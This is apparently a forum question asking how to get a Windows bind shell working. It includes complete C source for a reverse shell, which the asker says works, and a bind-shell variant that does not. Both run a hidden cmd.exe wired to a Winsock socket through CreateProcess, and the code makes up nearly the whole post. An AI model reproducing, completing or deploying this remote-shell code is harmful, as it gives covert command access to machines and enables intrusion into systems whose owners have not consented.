Hello, I would like to get bind/reverse shell with win32 winsock.
By calling CreateProcess with STARTF_USESTDHANDLES, I got a reverse shell (client mode) as expected. However I failed to got a bind shell (server mode) with same approach.
What is the difference between client mode (reverse shell) and server mode (bind shell)? How can I get a bind shell?
Appreciate your help.
Regards,
What I have tried:
Here is the code for client mode (reverse shell): it worked as expected.
#include "stdafx.h"
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment(lib, "ws2_32.lib")
#define BUFFERLEN (1024)
int spawnShell(void *my_socket, char *my_cmd)
{
STARTUPINFO s_info = { 0 };
PROCESS_INFORMATION p_info;
s_info.cb = sizeof(s_info);
s_info.wShowWindow = SW_HIDE;
s_info.dwFlags = STARTF_USESTDHANDLES;
s_info.hStdInput = my_socket;
s_info.hStdOutput = my_socket;
s_info.hStdError = my_socket;
CreateProcess(NULL, my_cmd, NULL, NULL, TRUE, 0, NULL, NULL, (STARTUPINFO*)&s_info, &p_info);
return 0;
}
int
main()
{
WSADATA wsaData;
struct sockaddr_in addr;
SOCKET sock;
int len;
char data[BUFFERLEN];
WSAStartup(MAKEWORD(2, 2), &wsaData);
sock = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
addr.sin_port = htons(22222);
connect(sock, (SOCKADDR *)&addr, sizeof(addr));
send(sock, "HELLO\n", 6, 0);
len = recv(sock, data, BUFFERLEN, 0);
data[len] = '\0';
printf(data);
spawnShell((void *)sock, "cmd");
return 0;
}
And here is the code for server mode (bind shell): it did not work.
#include "stdafx.h"
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment(lib, "ws2_32.lib")
#define BUFFERLEN (1024)
int spawnShell(void *my_socket, char *my_cmd)
{
STARTUPINFO s_info = { 0 };
PROCESS_INFORMATION p_info;
s_info.cb = sizeof(s_info);
s_info.wShowWindow = SW_HIDE;
s_info.dwFlags = STARTF_USESTDHANDLES;
s_info.hStdInput = my_socket;
s_info.hStdOutput = my_socket;
s_info.hStdError = my_socket;
CreateProcess(NULL, my_cmd, NULL, NULL, TRUE, 0, NULL, NULL, (STARTUPINFO*)&s_info, &p_info);
return 0;
}
int
main()
{
WSADATA wsaData;
SOCKET sock0;
struct sockaddr_in addr;
struct sockaddr_in client;
SOCKET sock;
int len;
char data[BUFFERLEN];
WSAStartup(MAKEWORD(2, 0), &wsaData);
sock0 = socket(AF_INET, SOCK_STREAM, 0);
addr.sin_family = AF_INET;
addr.sin_port = htons(11111);
addr.sin_addr.S_un.S_addr = INADDR_ANY;
bind(sock0, (struct sockaddr *)&addr, sizeof(addr));
listen(sock0, 5);
len = sizeof(client);
sock = accept(sock0, (struct sockaddr *)&client, &len);
send(sock, "HELLO\n", 6, 0);
len = recv(sock, data, BUFFERLEN, 0);
data[len] = '\0';
printf(data);
spawnShell((void *)sock,"cmd");
closesocket(sock);
WSACleanup();
return 0;
}